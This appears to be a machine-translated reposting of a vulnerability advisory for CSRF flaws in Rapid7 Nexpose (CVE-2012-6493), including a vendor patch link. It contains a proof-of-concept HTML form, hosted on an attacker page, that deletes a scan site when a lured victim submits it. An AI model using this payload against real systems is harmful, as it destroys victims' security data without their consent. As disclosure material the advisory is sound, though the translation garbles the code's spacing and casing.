Multiple Cross-Site Request Forgery vulnerabilities in Rapid7 Nexpose

Source: Internet
Author: User
Tags nexpose

Release date:
Updated on:

Affected Systems:
Rapid7 Nexpose <5.5.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57150
CVE (CAN) ID: CVE-2012-6493
 
Nexpose is a vulnerability management software.
 
In versions earlier than Nexpose 5.5.4, The refer domain of each URL is not correctly checked. If a remote attacker obtains the cookie of a legal user in some way, you can delete scan data and sites as valid users.
 
<* Source: Robert Gilbert

Link: http://seclists.org/bugtraq/2013/Jan/13
Https://community.rapid7.com/docs/DOC-2065#release5
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Exploit steps for proof-of-concept:
1. Create an external site/page: http://attackersite.com/nexpose-csrf.htm that contains:
[Code]
<Html>
<! -- Nexpose CSRF PoC -->
<Body>
<Form action = "https: // nexpose-security-console-site: 3780/data/site/delete? Siteid = 1 "; method =" POST "enctype =" multipart/form-data ">
<Input type = "submit" value = "delete site"/>
</Form>
<Script>
// Document. forms [0]. submit (); // uncomment to auto-submit
</Script>
</Body>
</Html>
[/Code]
2. Lure victim to http://attackersite.com/nexpose-csrf.htm.
3. Site with ID 1 is deleted when form is submitted.

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Rapid7
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Https://community.rapid7.com/docs/DOC-2065#release5

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.